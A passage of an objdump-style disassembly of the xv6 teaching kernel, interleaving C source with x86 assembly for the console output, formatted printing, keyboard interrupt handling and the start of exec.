04 24 20 00 00 00 movl $0x20,(%esp) 801004df: e8 2c 58 00 00 call 80105d10 <uartputc> 801004e4: c7 04 24 08 00 00 00 movl $0x8,(%esp) 801004eb: e8 20 58 00 00 call 80105d10 <uartputc> 801004f0: 83 c4 10 add $0x10,%esp 801004f3: e9 2a ff ff ff jmp 80100422 <consputc+0x32> if(pos < 0 || pos > 25*80) panic("pos under/overflow"); if((pos/80) >= 24){ // Scroll up. memmove(crt, crt+80, sizeof(crt[0])*23*80); 801004f8: 83 ec 04 sub $0x4,%esp pos -= 80; 801004fb: 8d 5f b0 lea -0x50(%edi),%ebx if(pos < 0 || pos > 25*80) panic("pos under/overflow"); if((pos/80) >= 24){ // Scroll up. memmove(crt, crt+80, sizeof(crt[0])*23*80); 801004fe: 68 60 0e 00 00 push $0xe60 80100503: 68 a0 80 0b 80 push $0x800b80a0 80100508: 68 00 80 0b 80 push $0x800b8000 pos -= 80; memset(crt+pos, 0, sizeof(crt[0])*(24*80 - pos)); 8010050d: 8d b4 1b 00 80 0b 80 lea -0x7ff48000(%ebx,%ebx,1),%esi if(pos < 0 || pos > 25*80) panic("pos under/overflow"); if((pos/80) >= 24){ // Scroll up. memmove(crt, crt+80, sizeof(crt[0])*23*80); 80100514: e8 27 42 00 00 call 80104740 <memmove> pos -= 80; memset(crt+pos, 0, sizeof(crt[0])*(24*80 - pos)); 80100519: b8 80 07 00 00 mov $0x780,%eax 8010051e: 83 c4 0c add $0xc,%esp 80100521: 29 d8 sub %ebx,%eax 80100523: 01 c0 add %eax,%eax 80100525: 50 push %eax 80100526: 6a 00 push $0x0 80100528: 56 push %esi 80100529: e8 62 41 00 00 call 80104690 <memset> 8010052e: 89 f1 mov %esi,%ecx 80100530: 83 c4 10 add $0x10,%esp 80100533: be 07 00 00 00 mov $0x7,%esi 80100538: e9 5c ff ff ff jmp 80100499 <consputc+0xa9> if(pos > 0) --pos; } else crt[pos++] = (c&0xff) | 0x0700; // black on white if(pos < 0 || pos > 25*80) panic("pos under/overflow"); 8010053d: 83 ec 0c sub $0xc,%esp 80100540: 68 e5 71 10 80 push $0x801071e5 80100545: e8 26 fe ff ff call 80100370 <panic> pos |= inb(CRTPORT+1); if(c == '\n') pos += 80 - pos%80; else if(c == BACKSPACE){ if(pos > 0) --pos; 8010054a: 85 c0 test %eax,%eax 8010054c: 8d 78 ff lea -0x1(%eax),%edi 8010054f: 0f 85 20 ff ff ff jne 80100475 <consputc+0x85> 80100555: b9 00 80 0b 80 mov $0x800b8000,%ecx 8010055a: 31 db xor %ebx,%ebx 8010055c: 31 f6 xor %esi,%esi 8010055e: e9 36 ff ff ff jmp 80100499 <consputc+0xa9> pos = inb(CRTPORT+1) << 8; outb(CRTPORT, 15); pos |= inb(CRTPORT+1); if(c == '\n') pos += 80 - pos%80; 80100563: ba 67 66 66 66 mov $0x66666667,%edx 80100568: f7 ea imul %edx 8010056a: 89 d0 mov %edx,%eax 8010056c: c1 e8 05 shr $0x5,%eax 8010056f: 8d 04 80 lea (%eax,%eax,4),%eax 80100572: c1 e0 04 shl $0x4,%eax 80100575: 8d 78 50 lea 0x50(%eax),%edi 80100578: e9 f8 fe ff ff jmp 80100475 <consputc+0x85> 8010057d: 8d 76 00 lea 0x0(%esi),%esi 80100580 <printint>: int locking; } cons; static void printint(int xx, int base, int sign) { 80100580: 55 push %ebp 80100581: 89 e5 mov %esp,%ebp 80100583: 57 push %edi 80100584: 56 push %esi 80100585: 53 push %ebx 80100586: 89 d6 mov %edx,%esi 80100588: 83 ec 2c sub $0x2c,%esp static char digits[] = "0123456789abcdef"; char buf[16]; int i; uint x; if(sign && (sign = xx < 0)) 8010058b: 85 c9 test %ecx,%ecx int locking; } cons; static void printint(int xx, int base, int sign) { 8010058d: 89 4d d4 mov %ecx,-0x2c(%ebp) static char digits[] = "0123456789abcdef"; char buf[16]; int i; uint x; if(sign && (sign = xx < 0)) 80100590: 74 0c je 8010059e <printint+0x1e> 80100592: 89 c7 mov %eax,%edi 80100594: c1 ef 1f shr $0x1f,%edi 80100597: 85 c0 test %eax,%eax 80100599: 89 7d d4 mov %edi,-0x2c(%ebp) 8010059c: 78 51 js 801005ef <printint+0x6f> x = -xx; else x = xx; i = 0; 8010059e: 31 ff xor %edi,%edi 801005a0: 8d 5d d7 lea -0x29(%ebp),%ebx 801005a3: eb 05 jmp 801005aa <printint+0x2a> 801005a5: 8d 76 00 lea 0x0(%esi),%esi do{ buf[i++] = digits[x % base]; 801005a8: 89 cf mov %ecx,%edi 801005aa: 31 d2 xor %edx,%edx 801005ac: 8d 4f 01 lea 0x1(%edi),%ecx 801005af: f7 f6 div %esi 801005b1: 0f b6 92 10 72 10 80 movzbl -0x7fef8df0(%edx),%edx }while((x /= base) != 0); 801005b8: 85 c0 test %eax,%eax else x = xx; i = 0; do{ buf[i++] = digits[x % base]; 801005ba: 88 14 0b mov %dl,(%ebx,%ecx,1) }while((x /= base) != 0); 801005bd: 75 e9 jne 801005a8 <printint+0x28> if(sign) 801005bf: 8b 45 d4 mov -0x2c(%ebp),%eax 801005c2: 85 c0 test %eax,%eax 801005c4: 74 08 je 801005ce <printint+0x4e> buf[i++] = '-'; 801005c6: c6 44 0d d8 2d movb $0x2d,-0x28(%ebp,%ecx,1) 801005cb: 8d 4f 02 lea 0x2(%edi),%ecx 801005ce: 8d 74 0d d7 lea -0x29(%ebp,%ecx,1),%esi 801005d2: 8d b6 00 00 00 00 lea 0x0(%esi),%esi while(--i >= 0) consputc(buf[i]); 801005d8: 0f be 06 movsbl (%esi),%eax 801005db: 83 ee 01 sub $0x1,%esi 801005de: e8 0d fe ff ff call 801003f0 <consputc> }while((x /= base) != 0); if(sign) buf[i++] = '-'; while(--i >= 0) 801005e3: 39 de cmp %ebx,%esi 801005e5: 75 f1 jne 801005d8 <printint+0x58> consputc(buf[i]); } 801005e7: 83 c4 2c add $0x2c,%esp 801005ea: 5b pop %ebx 801005eb: 5e pop %esi 801005ec: 5f pop %edi 801005ed: 5d pop %ebp 801005ee: c3 ret char buf[16]; int i; uint x; if(sign && (sign = xx < 0)) x = -xx; 801005ef: f7 d8 neg %eax 801005f1: eb ab jmp 8010059e <printint+0x1e> 801005f3: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 801005f9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80100600 <consolewrite>: return target - n; } int consolewrite(struct inode *ip, char *buf, int n) { 80100600: 55 push %ebp 80100601: 89 e5 mov %esp,%ebp 80100603: 57 push %edi 80100604: 56 push %esi 80100605: 53 push %ebx 80100606: 83 ec 18 sub $0x18,%esp int i; iunlock(ip); 80100609: ff 75 08 pushl 0x8(%ebp) return target - n; } int consolewrite(struct inode *ip, char *buf, int n) { 8010060c: 8b 75 10 mov 0x10(%ebp),%esi int i; iunlock(ip); 8010060f: e8 3c 11 00 00 call 80101750 <iunlock> acquire(&cons.lock); 80100614: c7 04 24 20 a5 10 80 movl $0x8010a520,(%esp) 8010061b: e8 00 3f 00 00 call 80104520 <acquire> 80100620: 8b 7d 0c mov 0xc(%ebp),%edi for(i = 0; i < n; i++) 80100623: 83 c4 10 add $0x10,%esp 80100626: 85 f6 test %esi,%esi 80100628: 8d 1c 37 lea (%edi,%esi,1),%ebx 8010062b: 7e 12 jle 8010063f <consolewrite+0x3f> 8010062d: 8d 76 00 lea 0x0(%esi),%esi consputc(buf[i] & 0xff); 80100630: 0f b6 07 movzbl (%edi),%eax 80100633: 83 c7 01 add $0x1,%edi 80100636: e8 b5 fd ff ff call 801003f0 <consputc> { int i; iunlock(ip); acquire(&cons.lock); for(i = 0; i < n; i++) 8010063b: 39 df cmp %ebx,%edi 8010063d: 75 f1 jne 80100630 <consolewrite+0x30> consputc(buf[i] & 0xff); release(&cons.lock); 8010063f: 83 ec 0c sub $0xc,%esp 80100642: 68 20 a5 10 80 push $0x8010a520 80100647: e8 f4 3f 00 00 call 80104640 <release> ilock(ip); 8010064c: 58 pop %eax 8010064d: ff 75 08 pushl 0x8(%ebp) 80100650: e8 1b 10 00 00 call 80101670 <ilock> return n; } 80100655: 8d 65 f4 lea -0xc(%ebp),%esp 80100658: 89 f0 mov %esi,%eax 8010065a: 5b pop %ebx 8010065b: 5e pop %esi 8010065c: 5f pop %edi 8010065d: 5d pop %ebp 8010065e: c3 ret 8010065f: 90 nop 80100660 <cprintf>: //PAGEBREAK: 50 // Print to the console. only understands %d, %x, %p, %s. void cprintf(char *fmt, ...) { 80100660: 55 push %ebp 80100661: 89 e5 mov %esp,%ebp 80100663: 57 push %edi 80100664: 56 push %esi 80100665: 53 push %ebx 80100666: 83 ec 1c sub $0x1c,%esp int i, c, locking; uint *argp; char *s; locking = cons.locking; 80100669: a1 54 a5 10 80 mov 0x8010a554,%eax if(locking) 8010066e: 85 c0 test %eax,%eax { int i, c, locking; uint *argp; char *s; locking = cons.locking; 80100670: 89 45 e0 mov %eax,-0x20(%ebp) if(locking) 80100673: 0f 85 47 01 00 00 jne 801007c0 <cprintf+0x160> acquire(&cons.lock); if (fmt == 0) 80100679: 8b 45 08 mov 0x8(%ebp),%eax 8010067c: 85 c0 test %eax,%eax 8010067e: 89 c1 mov %eax,%ecx 80100680: 0f 84 4f 01 00 00 je 801007d5 <cprintf+0x175> panic("null fmt"); argp = (uint*)(void*)(&fmt + 1); for(i = 0; (c = fmt[i] & 0xff) != 0; i++){ 80100686: 0f b6 00 movzbl (%eax),%eax 80100689: 31 db xor %ebx,%ebx 8010068b: 8d 75 0c lea 0xc(%ebp),%esi 8010068e: 89 cf mov %ecx,%edi 80100690: 85 c0 test %eax,%eax 80100692: 75 55 jne 801006e9 <cprintf+0x89> 80100694: eb 68 jmp 801006fe <cprintf+0x9e> 80100696: 8d 76 00 lea 0x0(%esi),%esi 80100699: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi if(c != '%'){ consputc(c); continue; } c = fmt[++i] & 0xff; 801006a0: 83 c3 01 add $0x1,%ebx 801006a3: 0f b6 14 1f movzbl (%edi,%ebx,1),%edx if(c == 0) 801006a7: 85 d2 test %edx,%edx 801006a9: 74 53 je 801006fe <cprintf+0x9e> break; switch(c){ 801006ab: 83 fa 70 cmp $0x70,%edx 801006ae: 74 7a je 8010072a <cprintf+0xca> 801006b0: 7f 6e jg 80100720 <cprintf+0xc0> 801006b2: 83 fa 25 cmp $0x25,%edx 801006b5: 0f 84 ad 00 00 00 je 80100768 <cprintf+0x108> 801006bb: 83 fa 64 cmp $0x64,%edx 801006be: 0f 85 84 00 00 00 jne 80100748 <cprintf+0xe8> case 'd': printint(*argp++, 10, 1); 801006c4: 8d 46 04 lea 0x4(%esi),%eax 801006c7: b9 01 00 00 00 mov $0x1,%ecx 801006cc: ba 0a 00 00 00 mov $0xa,%edx 801006d1: 89 45 e4 mov %eax,-0x1c(%ebp) 801006d4: 8b 06 mov (%esi),%eax 801006d6: e8 a5 fe ff ff call 80100580 <printint> 801006db: 8b 75 e4 mov -0x1c(%ebp),%esi if (fmt == 0) panic("null fmt"); argp = (uint*)(void*)(&fmt + 1); for(i = 0; (c = fmt[i] & 0xff) != 0; i++){ 801006de: 83 c3 01 add $0x1,%ebx 801006e1: 0f b6 04 1f movzbl (%edi,%ebx,1),%eax 801006e5: 85 c0 test %eax,%eax 801006e7: 74 15 je 801006fe <cprintf+0x9e> if(c != '%'){ 801006e9: 83 f8 25 cmp $0x25,%eax 801006ec: 74 b2 je 801006a0 <cprintf+0x40> s = "(null)"; for(; *s; s++) consputc(*s); break; case '%': consputc('%'); 801006ee: e8 fd fc ff ff call 801003f0 <consputc> if (fmt == 0) panic("null fmt"); argp = (uint*)(void*)(&fmt + 1); for(i = 0; (c = fmt[i] & 0xff) != 0; i++){ 801006f3: 83 c3 01 add $0x1,%ebx 801006f6: 0f b6 04 1f movzbl (%edi,%ebx,1),%eax 801006fa: 85 c0 test %eax,%eax 801006fc: 75 eb jne 801006e9 <cprintf+0x89> consputc(c); break; } } if(locking) 801006fe: 8b 45 e0 mov -0x20(%ebp),%eax 80100701: 85 c0 test %eax,%eax 80100703: 74 10 je 80100715 <cprintf+0xb5> release(&cons.lock); 80100705: 83 ec 0c sub $0xc,%esp 80100708: 68 20 a5 10 80 push $0x8010a520 8010070d: e8 2e 3f 00 00 call 80104640 <release> 80100712: 83 c4 10 add $0x10,%esp } 80100715: 8d 65 f4 lea -0xc(%ebp),%esp 80100718: 5b pop %ebx 80100719: 5e pop %esi 8010071a: 5f pop %edi 8010071b: 5d pop %ebp 8010071c: c3 ret 8010071d: 8d 76 00 lea 0x0(%esi),%esi continue; } c = fmt[++i] & 0xff; if(c == 0) break; switch(c){ 80100720: 83 fa 73 cmp $0x73,%edx 80100723: 74 5b je 80100780 <cprintf+0x120> 80100725: 83 fa 78 cmp $0x78,%edx 80100728: 75 1e jne 80100748 <cprintf+0xe8> case 'd': printint(*argp++, 10, 1); break; case 'x': case 'p': printint(*argp++, 16, 0); 8010072a: 8d 46 04 lea 0x4(%esi),%eax 8010072d: 31 c9 xor %ecx,%ecx 8010072f: ba 10 00 00 00 mov $0x10,%edx 80100734: 89 45 e4 mov %eax,-0x1c(%ebp) 80100737: 8b 06 mov (%esi),%eax 80100739: e8 42 fe ff ff call 80100580 <printint> 8010073e: 8b 75 e4 mov -0x1c(%ebp),%esi break; 80100741: eb 9b jmp 801006de <cprintf+0x7e> 80100743: 90 nop 80100744: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi case '%': consputc('%'); break; default: // Print unknown % sequence to draw attention. consputc('%'); 80100748: b8 25 00 00 00 mov $0x25,%eax 8010074d: 89 55 e4 mov %edx,-0x1c(%ebp) 80100750: e8 9b fc ff ff call 801003f0 <consputc> consputc(c); 80100755: 8b 55 e4 mov -0x1c(%ebp),%edx 80100758: 89 d0 mov %edx,%eax 8010075a: e8 91 fc ff ff call 801003f0 <consputc> break; 8010075f: e9 7a ff ff ff jmp 801006de <cprintf+0x7e> 80100764: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi s = "(null)"; for(; *s; s++) consputc(*s); break; case '%': consputc('%'); 80100768: b8 25 00 00 00 mov $0x25,%eax 8010076d: e8 7e fc ff ff call 801003f0 <consputc> 80100772: e9 7c ff ff ff jmp 801006f3 <cprintf+0x93> 80100777: 89 f6 mov %esi,%esi 80100779: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi case 'x': case 'p': printint(*argp++, 16, 0); break; case 's': if((s = (char*)*argp++) == 0) 80100780: 8d 46 04 lea 0x4(%esi),%eax 80100783: 8b 36 mov (%esi),%esi 80100785: 89 45 e4 mov %eax,-0x1c(%ebp) s = "(null)"; 80100788: b8 f8 71 10 80 mov $0x801071f8,%eax 8010078d: 85 f6 test %esi,%esi 8010078f: 0f 44 f0 cmove %eax,%esi for(; *s; s++) 80100792: 0f be 06 movsbl (%esi),%eax 80100795: 84 c0 test %al,%al 80100797: 74 16 je 801007af <cprintf+0x14f> 80100799: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 801007a0: 83 c6 01 add $0x1,%esi consputc(*s); 801007a3: e8 48 fc ff ff call 801003f0 <consputc> printint(*argp++, 16, 0); break; case 's': if((s = (char*)*argp++) == 0) s = "(null)"; for(; *s; s++) 801007a8: 0f be 06 movsbl (%esi),%eax 801007ab: 84 c0 test %al,%al 801007ad: 75 f1 jne 801007a0 <cprintf+0x140> case 'x': case 'p': printint(*argp++, 16, 0); break; case 's': if((s = (char*)*argp++) == 0) 801007af: 8b 75 e4 mov -0x1c(%ebp),%esi 801007b2: e9 27 ff ff ff jmp 801006de <cprintf+0x7e> 801007b7: 89 f6 mov %esi,%esi 801007b9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi uint *argp; char *s; locking = cons.locking; if(locking) acquire(&cons.lock); 801007c0: 83 ec 0c sub $0xc,%esp 801007c3: 68 20 a5 10 80 push $0x8010a520 801007c8: e8 53 3d 00 00 call 80104520 <acquire> 801007cd: 83 c4 10 add $0x10,%esp 801007d0: e9 a4 fe ff ff jmp 80100679 <cprintf+0x19> if (fmt == 0) panic("null fmt"); 801007d5: 83 ec 0c sub $0xc,%esp 801007d8: 68 ff 71 10 80 push $0x801071ff 801007dd: e8 8e fb ff ff call 80100370 <panic> 801007e2: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 801007e9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 801007f0 <consoleintr>: #define C(x) ((x)-'@') // Control-x void consoleintr(int (*getc)(void)) { 801007f0: 55 push %ebp 801007f1: 89 e5 mov %esp,%ebp 801007f3: 57 push %edi 801007f4: 56 push %esi 801007f5: 53 push %ebx int c, doprocdump = 0; 801007f6: 31 f6 xor %esi,%esi #define C(x) ((x)-'@') // Control-x void consoleintr(int (*getc)(void)) { 801007f8: 83 ec 18 sub $0x18,%esp 801007fb: 8b 5d 08 mov 0x8(%ebp),%ebx int c, doprocdump = 0; acquire(&cons.lock); 801007fe: 68 20 a5 10 80 push $0x8010a520 80100803: e8 18 3d 00 00 call 80104520 <acquire> while((c = getc()) >= 0){ 80100808: 83 c4 10 add $0x10,%esp 8010080b: 90 nop 8010080c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80100810: ff d3 call *%ebx 80100812: 85 c0 test %eax,%eax 80100814: 89 c7 mov %eax,%edi 80100816: 78 48 js 80100860 <consoleintr+0x70> switch(c){ 80100818: 83 ff 10 cmp $0x10,%edi 8010081b: 0f 84 3f 01 00 00 je 80100960 <consoleintr+0x170> 80100821: 7e 5d jle 80100880 <consoleintr+0x90> 80100823: 83 ff 15 cmp $0x15,%edi 80100826: 0f 84 dc 00 00 00 je 80100908 <consoleintr+0x118> 8010082c: 83 ff 7f cmp $0x7f,%edi 8010082f: 75 54 jne 80100885 <consoleintr+0x95> input.e--; consputc(BACKSPACE); } break; case C('H'): case '\x7f': // Backspace if(input.e != input.w){ 80100831: a1 c8 ff 10 80 mov 0x8010ffc8,%eax 80100836: 3b 05 c4 ff 10 80 cmp 0x8010ffc4,%eax 8010083c: 74 d2 je 80100810 <consoleintr+0x20> input.e--; 8010083e: 83 e8 01 sub $0x1,%eax 80100841: a3 c8 ff 10 80 mov %eax,0x8010ffc8 consputc(BACKSPACE); 80100846: b8 00 01 00 00 mov $0x100,%eax 8010084b: e8 a0 fb ff ff call 801003f0 <consputc> consoleintr(int (*getc)(void)) { int c, doprocdump = 0; acquire(&cons.lock); while((c = getc()) >= 0){ 80100850: ff d3 call *%ebx 80100852: 85 c0 test %eax,%eax 80100854: 89 c7 mov %eax,%edi 80100856: 79 c0 jns 80100818 <consoleintr+0x28> 80100858: 90 nop 80100859: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi } } break; } } release(&cons.lock); 80100860: 83 ec 0c sub $0xc,%esp 80100863: 68 20 a5 10 80 push $0x8010a520 80100868: e8 d3 3d 00 00 call 80104640 <release> if(doprocdump) { 8010086d: 83 c4 10 add $0x10,%esp 80100870: 85 f6 test %esi,%esi 80100872: 0f 85 f8 00 00 00 jne 80100970 <consoleintr+0x180> procdump(); // now call procdump() wo. cons.lock held } } 80100878: 8d 65 f4 lea -0xc(%ebp),%esp 8010087b: 5b pop %ebx 8010087c: 5e pop %esi 8010087d: 5f pop %edi 8010087e: 5d pop %ebp 8010087f: c3 ret { int c, doprocdump = 0; acquire(&cons.lock); while((c = getc()) >= 0){ switch(c){ 80100880: 83 ff 08 cmp $0x8,%edi 80100883: 74 ac je 80100831 <consoleintr+0x41> input.e--; consputc(BACKSPACE); } break; default: if(c != 0 && input.e-input.r < INPUT_BUF){ 80100885: 85 ff test %edi,%edi 80100887: 74 87 je 80100810 <consoleintr+0x20> 80100889: a1 c8 ff 10 80 mov 0x8010ffc8,%eax 8010088e: 89 c2 mov %eax,%edx 80100890: 2b 15 c0 ff 10 80 sub 0x8010ffc0,%edx 80100896: 83 fa 7f cmp $0x7f,%edx 80100899: 0f 87 71 ff ff ff ja 80100810 <consoleintr+0x20> c = (c == '\r') ? '\n' : c; input.buf[input.e++ % INPUT_BUF] = c; 8010089f: 8d 50 01 lea 0x1(%eax),%edx 801008a2: 83 e0 7f and $0x7f,%eax consputc(BACKSPACE); } break; default: if(c != 0 && input.e-input.r < INPUT_BUF){ c = (c == '\r') ? '\n' : c; 801008a5: 83 ff 0d cmp $0xd,%edi input.buf[input.e++ % INPUT_BUF] = c; 801008a8: 89 15 c8 ff 10 80 mov %edx,0x8010ffc8 consputc(BACKSPACE); } break; default: if(c != 0 && input.e-input.r < INPUT_BUF){ c = (c == '\r') ? '\n' : c; 801008ae: 0f 84 c8 00 00 00 je 8010097c <consoleintr+0x18c> input.buf[input.e++ % INPUT_BUF] = c; 801008b4: 89 f9 mov %edi,%ecx 801008b6: 88 88 40 ff 10 80 mov %cl,-0x7fef00c0(%eax) consputc(c); 801008bc: 89 f8 mov %edi,%eax 801008be: e8 2d fb ff ff call 801003f0 <consputc> if(c == '\n' || c == C('D') || input.e == input.r+INPUT_BUF){ 801008c3: 83 ff 0a cmp $0xa,%edi 801008c6: 0f 84 c1 00 00 00 je 8010098d <consoleintr+0x19d> 801008cc: 83 ff 04 cmp $0x4,%edi 801008cf: 0f 84 b8 00 00 00 je 8010098d <consoleintr+0x19d> 801008d5: a1 c0 ff 10 80 mov 0x8010ffc0,%eax 801008da: 83 e8 80 sub $0xffffff80,%eax 801008dd: 39 05 c8 ff 10 80 cmp %eax,0x8010ffc8 801008e3: 0f 85 27 ff ff ff jne 80100810 <consoleintr+0x20> input.w = input.e; wakeup(&input.r); 801008e9: 83 ec 0c sub $0xc,%esp if(c != 0 && input.e-input.r < INPUT_BUF){ c = (c == '\r') ? '\n' : c; input.buf[input.e++ % INPUT_BUF] = c; consputc(c); if(c == '\n' || c == C('D') || input.e == input.r+INPUT_BUF){ input.w = input.e; 801008ec: a3 c4 ff 10 80 mov %eax,0x8010ffc4 wakeup(&input.r); 801008f1: 68 c0 ff 10 80 push $0x8010ffc0 801008f6: e8 e5 35 00 00 call 80103ee0 <wakeup> 801008fb: 83 c4 10 add $0x10,%esp 801008fe: e9 0d ff ff ff jmp 80100810 <consoleintr+0x20> 80100903: 90 nop 80100904: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi case C('P'): // Process listing. // procdump() locks cons.lock indirectly; invoke later doprocdump = 1; break; case C('U'): // Kill line. while(input.e != input.w && 80100908: a1 c8 ff 10 80 mov 0x8010ffc8,%eax 8010090d: 39 05 c4 ff 10 80 cmp %eax,0x8010ffc4 80100913: 75 2b jne 80100940 <consoleintr+0x150> 80100915: e9 f6 fe ff ff jmp 80100810 <consoleintr+0x20> 8010091a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi input.buf[(input.e-1) % INPUT_BUF] != '\n'){ input.e--; 80100920: a3 c8 ff 10 80 mov %eax,0x8010ffc8 consputc(BACKSPACE); 80100925: b8 00 01 00 00 mov $0x100,%eax 8010092a: e8 c1 fa ff ff call 801003f0 <consputc> case C('P'): // Process listing. // procdump() locks cons.lock indirectly; invoke later doprocdump = 1; break; case C('U'): // Kill line. while(input.e != input.w && 8010092f: a1 c8 ff 10 80 mov 0x8010ffc8,%eax 80100934: 3b 05 c4 ff 10 80 cmp 0x8010ffc4,%eax 8010093a: 0f 84 d0 fe ff ff je 80100810 <consoleintr+0x20> input.buf[(input.e-1) % INPUT_BUF] != '\n'){ 80100940: 83 e8 01 sub $0x1,%eax 80100943: 89 c2 mov %eax,%edx 80100945: 83 e2 7f and $0x7f,%edx case C('P'): // Process listing. // procdump() locks cons.lock indirectly; invoke later doprocdump = 1; break; case C('U'): // Kill line. while(input.e != input.w && 80100948: 80 ba 40 ff 10 80 0a cmpb $0xa,-0x7fef00c0(%edx) 8010094f: 75 cf jne 80100920 <consoleintr+0x130> 80100951: e9 ba fe ff ff jmp 80100810 <consoleintr+0x20> 80100956: 8d 76 00 lea 0x0(%esi),%esi 80100959: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi acquire(&cons.lock); while((c = getc()) >= 0){ switch(c){ case C('P'): // Process listing. // procdump() locks cons.lock indirectly; invoke later doprocdump = 1; 80100960: be 01 00 00 00 mov $0x1,%esi 80100965: e9 a6 fe ff ff jmp 80100810 <consoleintr+0x20> 8010096a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi } release(&cons.lock); if(doprocdump) { procdump(); // now call procdump() wo. cons.lock held } } 80100970: 8d 65 f4 lea -0xc(%ebp),%esp 80100973: 5b pop %ebx 80100974: 5e pop %esi 80100975: 5f pop %edi 80100976: 5d pop %ebp break; } } release(&cons.lock); if(doprocdump) { procdump(); // now call procdump() wo. cons.lock held 80100977: e9 54 36 00 00 jmp 80103fd0 <procdump> } break; default: if(c != 0 && input.e-input.r < INPUT_BUF){ c = (c == '\r') ? '\n' : c; input.buf[input.e++ % INPUT_BUF] = c; 8010097c: c6 80 40 ff 10 80 0a movb $0xa,-0x7fef00c0(%eax) consputc(c); 80100983: b8 0a 00 00 00 mov $0xa,%eax 80100988: e8 63 fa ff ff call 801003f0 <consputc> 8010098d: a1 c8 ff 10 80 mov 0x8010ffc8,%eax 80100992: e9 52 ff ff ff jmp 801008e9 <consoleintr+0xf9> 80100997: 89 f6 mov %esi,%esi 80100999: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 801009a0 <consoleinit>: return n; } void consoleinit(void) { 801009a0: 55 push %ebp 801009a1: 89 e5 mov %esp,%ebp 801009a3: 83 ec 10 sub $0x10,%esp initlock(&cons.lock, "console"); 801009a6: 68 08 72 10 80 push $0x80107208 801009ab: 68 20 a5 10 80 push $0x8010a520 801009b0: e8 6b 3a 00 00 call 80104420 <initlock> devsw[CONSOLE].write = consolewrite; devsw[CONSOLE].read = consoleread; cons.locking = 1; ioapicenable(IRQ_KBD, 0); 801009b5: 58 pop %eax 801009b6: 5a pop %edx 801009b7: 6a 00 push $0x0 801009b9: 6a 01 push $0x1 void consoleinit(void) { initlock(&cons.lock, "console"); devsw[CONSOLE].write = consolewrite; 801009bb: c7 05 8c 09 11 80 00 movl $0x80100600,0x8011098c 801009c2: 06 10 80 devsw[CONSOLE].read = consoleread; 801009c5: c7 05 88 09 11 80 70 movl $0x80100270,0x80110988 801009cc: 02 10 80 cons.locking = 1; 801009cf: c7 05 54 a5 10 80 01 movl $0x1,0x8010a554 801009d6: 00 00 00 ioapicenable(IRQ_KBD, 0); 801009d9: e8 c2 18 00 00 call 801022a0 <ioapicenable> } 801009de: 83 c4 10 add $0x10,%esp 801009e1: c9 leave 801009e2: c3 ret 801009e3: 66 90 xchg %ax,%ax 801009e5: 66 90 xchg %ax,%ax 801009e7: 66 90 xchg %ax,%ax 801009e9: 66 90 xchg %ax,%ax 801009eb: 66 90 xchg %ax,%ax 801009ed: 66 90 xchg %ax,%ax 801009ef: 90 nop 801009f0 <exec>: #include "x86.h" #include "elf.h" int exec(char *path, char **argv) { 801009f0: 55 push %ebp 801009f1: 89 e5 mov %esp,%ebp 801009f3: 57 push %edi 801009f4: 56 push %esi 801009f5: 53 push %ebx 801009f6: 81 ec 0c 01 00 00 sub $0x10c,%esp uint argc, sz, sp, ustack[3+MAXARG+1]; struct elfhdr elf; struct inode *ip; struct proghdr ph; pde_t *pgdir, *oldpgdir; struct proc *curproc = myproc(); 801009fc: e8 7f 2d 00 00 call 80103780 <myproc> 80100a01: 89 85 f4 fe ff ff mov %eax,-0x10c(%ebp) begin_op(); 80100a07: e8 44 21 00 00 call 80102b50 <begin_op> if((ip = namei(path)) == 0){ 80100a0c: 83 ec 0c sub $0xc,%esp 80100a0f: ff 75 08 pushl 0x8(%ebp) 80100a12: e8 a9 14 00 00 call 80101ec0 <namei> 80100a17: 83 c4 10 add $0x10,%esp 80100a1a: 85 c0 test %eax,%eax 80100a1c: 0f 84 9c 01 00 00 je 80100bbe <exec+0x1ce> end_op(); cprintf("exec: fail\n"); return -1; } ilock(ip); 80100a22: 83 ec 0c sub $0xc,%esp 80100a25: 89 c3 mov %eax,%ebx 80100a27: 50 push %eax 80100a28: e8 43 0c 00 00 call 80101670 <ilock> pgdir = 0; // Check ELF header if(readi(ip, (char*)&elf, 0, sizeof(elf)) != sizeof(elf)) 80100a2d: 8d 85 24 ff ff ff lea -0xdc(%ebp),%eax 80100a33: 6a 34 push $0x34 80100a35: 6a 00 push $0x0 80100a37: 50 push %eax 80100a38: 53 push %ebx 80100a39: e8 12 0f 00 00 call 80101950 <readi> 80100a3e: 83 c4 20 add $0x20,%esp 80100a41: 83 f8 34 cmp $0x34,%eax 80100a44: 74 22 je 80100a68 <exec+0x78> bad: if(pgdir) freevm(pgdir); if(ip){ iunlockput(ip); 80100a46: 83 ec 0c sub $0xc,%esp 80100a49: 53 push %ebx 80100a4a: e8 b1 0e 00 00 call 80101900 <iunlockput> end_op(); 80100a4f: e8 6c 21 00 00 call 80102bc0 <end_op> 80100a54: 83 c4 10 add $0x10,%esp } return -1; 80100a57: b8 ff ff ff ff mov $0xffffffff,%eax } 80100a5c: 8d 65 f4 lea -0xc(%ebp),%esp 80100a5f: 5b pop %ebx 80100a60: 5e pop %esi 80100a61: 5f pop %edi 80100a62: 5d pop %ebp 80100a63: c3 ret 80100a64: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi pgdir = 0; // Check ELF header if(readi(ip, (char*)&elf, 0, sizeof(elf)) != sizeof(elf)) goto bad; if(elf.magic != ELF_MAGIC) 80100a68: 81 bd 24 ff ff ff 7f cmpl $0x464c457f,-0xdc(%ebp) 80100a6f: 45 4c 46 80100a72: 75 d2 jne 80100a46 <exec+0x56> goto bad; if((pgdir 